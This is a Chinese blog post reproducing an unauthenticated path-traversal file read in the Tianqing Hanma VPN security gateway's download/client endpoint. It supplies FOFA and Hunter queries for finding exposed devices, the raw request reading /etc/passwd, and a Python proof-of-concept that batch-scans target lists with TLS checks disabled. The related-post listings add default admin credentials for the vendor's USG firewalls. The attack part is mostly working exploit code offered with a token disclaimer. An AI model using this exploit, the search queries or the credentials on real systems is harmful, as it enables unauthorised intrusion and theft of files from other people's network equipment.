【漏洞复现】天清汉马VPN安全网关系统——download/client——任意文件读取

于 2024-07-13 10:21:50 发布
阅读量283 收藏 3
点赞数 5
分类专栏: 漏洞复现 文章标签: 安全 网络 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LongL_GuYu/article/details/140395258
版权

声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。

文章目录

漏洞描述

天清汉马VPN安全网关系统产品是启明星辰集团依靠雄厚的技术优势,依靠多年信息安全产品研发的积累,严格遵照国家有关主管部门的设计规范要求,具有完全自主知识产权的SSL/IPSec 二合一VPN安全网关系统,为用户提供安全的传输链路加密服务。其download/client接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件。

漏洞复现

1)信息收集
fofa:app="网御星云-VPN" || (body="select_auth_method" && body="select_auth_input") || app="启明星辰-天清汉马VPN"
hunter:app.name=="启明星辰天清汉马 VPN"||(body="select_auth_method"&&body="select_auth_input")||web.icon="ab09fbf7665449fc97bf31a8abcc36e6"
在这里插入图片描述
对于事情的预期越低,失败的时候越不伤心,成功的时候就越快乐。
在这里插入图片描述

2)构造数据包

GET /vpn/user/download/client?ostype=../../../../../../../etc/passwd HTTP/1.1
Host:ip

在这里插入图片描述
回显内容包含passwd文件,漏洞存在。

测试工具

poc

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import argparse
import time
import ssl
from urllib3.exceptions import InsecureRequestWarning
from requests.adapters import HTTPAdapter
from urllib3.poolmanager import PoolManager

RED = '\033[91m'
RESET = '\033[0m'
# 忽略不安全请求的警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

class TlsAdapter(HTTPAdapter):
    def init_poolmanager(self, *args, **kwargs):
        ctx = ssl.create_default_context()
        ctx.set_ciphers('ALL:@SECLEVEL=1')
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        kwargs['ssl_context'] = ctx
        return super(TlsAdapter, self).init_poolmanager(*args, **kwargs)

def check_vulnerability(url):
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15'
    }

    file_read_url = f"{url.rstrip('/')}/vpn/user/download/client?ostype=../../../../../../../etc/passwd"

    session = requests.Session()
    session.mount('https://', TlsAdapter())

    try:
        response = session.get(file_read_url, headers=headers, verify=False, timeout=30)
        if response.status_code == 200 and "root" in response.text:
            print(f"{RED}URL [{url}] 存在启明星辰天青汉马VPN-download-client-任意文件读取漏洞{RESET}")
        else:
            print(f"URL [{url}] 可能不存在漏洞")
    except requests.RequestException as e:
        print(f"URL [{url}] 请求失败: {e}")

def main():
    parser = argparse.ArgumentParser(description='检测目标地址是否启明星辰天青汉马VPN-download-client-任意文件读取漏洞')
    parser.add_argument('-u', '--url', help='指定目标地址')
    parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')

    args = parser.parse_args()

    if args.url:
        if not args.url.startswith("http://") and not args.url.startswith("https://"):
            args.url = "http://" + args.url
        check_vulnerability(args.url)
    elif args.file:
        with open(args.file, 'r') as file:
            urls = file.read().splitlines()
            for url in urls:
                if not url.startswith("http://") and not url.startswith("https://"):
                    url = "http://" + url
                check_vulnerability(url)

if __name__ == '__main__':
    main()

运行截图
在这里插入图片描述

热爱是引领前进的第一动力。

Long._.L
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CNVD-2021-17391 启明天清汉马USG防火墙逻辑缺陷漏洞复现
afei001
04-24 1481
目录 1.前言 2.漏洞概述 3.影响版本 4.漏洞等级 5.漏洞复现 5.1 FOFA实战复现 6.漏洞修复 声明:请勿进行非授权测试,否则后果自负。 1.前言 该漏洞是CNVD 4月8号收录的,那看来2021 HW第一天爆出来的洞就是这个了,不过该漏洞的利用也要之前的弱口令作为支撑。 CNVD:h...
CNVD-2021-12793 启明天清汉马USG防火墙弱口令漏洞复现
afei001
04-24 1854
目录 1.前言 2.漏洞概述 3.影响版本 4.漏洞等级 5.漏洞复现 5.1 FOFA实战复现 6.漏洞修复 声明:请勿进行非授权测试,否则后果自负。 1.前言 2021HW期间,互联网威胁情报中就有该漏洞。这个漏洞也挺无语的,因为在网上搜到最早是墨者学院的一个靶场。CNVD公开日期2021年3月11日,而这篇博客的时间是在19年7月份,无语吧。没想到FOFA随便找一下还真有,心也真够大的,放在公网上,默认密码都不改。 ...
启明星辰 天清汉马USG防火墙(后台弱口令/任意用户权限)
qq_52469895的博客
04-11 7766
fofa语句: title="天清汉马USG防火墙" 默认账号密码 账号:useradmin 密码:venus.user 到后台后,进入管理员页面 修改访问权限,即可使用该用户
(CNVD-2021-17391)|启明星辰-‘‘天清汉马USG防火墙‘‘逻辑漏洞
qq_17754023的博客
02-28 3834
0x01 漏洞说明 启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞,攻击者可利用该漏洞从低权限越权到管理员权限,可进行用户密码重置和权限设置等高权限操作 0x02 影响版本 天清汉马USG防火墙 0x03 漏洞复现 Fofa搜索标题:(注意:互联网的非授权利用属于违法行为) title='天清汉马USG防火墙' 通过百度文库查找到配置手册: 可以看见存在三种角色: 系统管理员:admin/venus.usg -----最高权限,可使用所有功能 审计员 ...
天清汉马USG一体化安全网关-命令行用户手册
11-18
系统管理、系统配置、配置用户、配置认证用户、网络设置、配置安全域、配置NAT、DHCP、HA、DDNS、安全策略、防DOS攻击等等
天清汉马防火墙培训手册.pdf
04-14
天清汉马防火墙培训手册
天清汉马USG一体化安全网关_命令行用户手册
08-29
启明星辰统一威胁管理设备使用手册,手册分几个系列,总共4本
天清汉马USG-FW-P防火墙用户使用手册.pdf
09-26
天清汉马USG-FW-P防火墙用户使用手册
启明星辰防火墙配置手册-天清汉马
08-15
启明星辰防火墙配置手册-天清汉马
DNSSec:网络安全的守护者
jiamisoft的博客
07-12 275
DNSSec是一种安全协议,它为DNS查询和响应过程提供了额外的加密层。通过使用公钥基础设施(PKI)和数字签名,DNSSec能够验证DNS响应的真实性,从而防止DNS欺骗攻击,即攻击者将用户重定向到恶意网站的行为。
医疗健康信息的安全挑战与隐私保护最佳实践
2301_79955948的博客
07-12 555
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
移动互联安全扩展要求测评项
hakksjss的博客
07-10 974
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
安全防御-用户认证综合实验
最新发布
weixin_69863399的博客
07-12 191
生产区访问DMZ需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab@123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。做相关的认证策略,研发部IP地址(10.0.1.20)固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证;
警钟!电池储能安全事故频发!物联网技术如何加强储能安全排查?
olzorange的博客
07-08 421
物联网技术的应用为储能安全排查提供了从源头预防到快速响应的全链条解决方案。
车载视频监控管理方案:无人驾驶出租车安全出行的保障
TSINGSEE青犀视频官方技术博客
07-12 334
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。
网络设备安全
weixin_48579910的博客
07-11 823
交换机作为网络核心设备,其安全性直接影响到整个网络的稳定和安全。通过实施身份验证和访问控制、设备配置安全、VLAN安全、ARP欺骗防护、MAC地址安全、DHCP欺骗防护、STP安全、拒绝服务防护以及固件和软件更新等措施,可以有效防范各种安全威胁。结合使用适当的安全工具和技术,组织可以大幅提高其交换机的安全防护能力,保护网络基础设施和数据的安全。定期进行安全审计和更新,确保交换机和网络始终处于最佳安全状态。确保路由器的安全是保护整个网络基础设施和数据传输安全的关键。
[终端安全]-5 移动终端之操作系统安全
wendywm0496的博客
07-08 990
每个应用程序运行在一个独立的进程中,通过操作系统的内存管理单元(MMU)实现自己独立的虚拟地址空间,通常从0开始到某个最大值(例如,32位系统上为4GB),这个空间是进程私有的,MMU负责将虚拟地址转换为物理地址。当操作系统在不同进程之间切换时,会切换当前的页表,通过改变MMU中存储的页表基地址(通常存储在寄存器中)来实现,这样进程A和进程B即使使用相同的虚拟地址,也会映射到不同的物理地址。当用户启动应用A时,操作系统会为其创建一个新的进程,该进程由应用A的UID 10001运行;
用XDR的思路保护API安全
AKAMAI_CHINA的博客
07-08 948
云计算飞速发展的今天,越来越多应用程序已经转为选择云原生架构,这就少不了Serverless、微服务、API等技术的协助。但同时也有越来越多的企业认识到,一定程度的“API安全”在整体安全与合规态势中发挥着至关重要的作用。然而,对很多企业来说,可能并不太明确API安全技术投资在其更广泛安全栈中的位置。
天清汉马usg一体化安全网关-数据中心用户手册
01-09
天清汉马usg一体化安全网关-数据中心用户手册是针对数据中心用户设计的一份操作指南。本手册主要介绍了usg一体化安全网关在数据中心环境下的使用方法和注意事项。 首先,手册详细介绍了usg一体化安全网关的基本功能和组件,包括硬件设备、软件系统安全防护模块等。用户可以通过手册了解到usg一体化安全网关的整体架构和工作原理,有助于对设备进行更深入的理解和使用。 其次,手册重点介绍了usg一体化安全网关的部署和配置方法。用户可以通过手册了解到如何进行设备的初始化设置、网络连接、安全策略的配置等操作步骤,以确保设备能够正常运行并实现数据中心的安全防护需求。 此外,手册还包括了usg一体化安全网关的日常维护和故障处理内容。用户可以在手册中找到一些常见问题的解决方法和设备的维护建议,有助于提高设备的使用效率和长期稳定性。 总的来说,天清汉马usg一体化安全网关-数据中心用户手册是一份全面的操作指南,为数据中心用户提供了详细的设备使用和维护信息,有助于用户更好地理解和使用usg一体化安全网关,确保数据中心的安全运行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值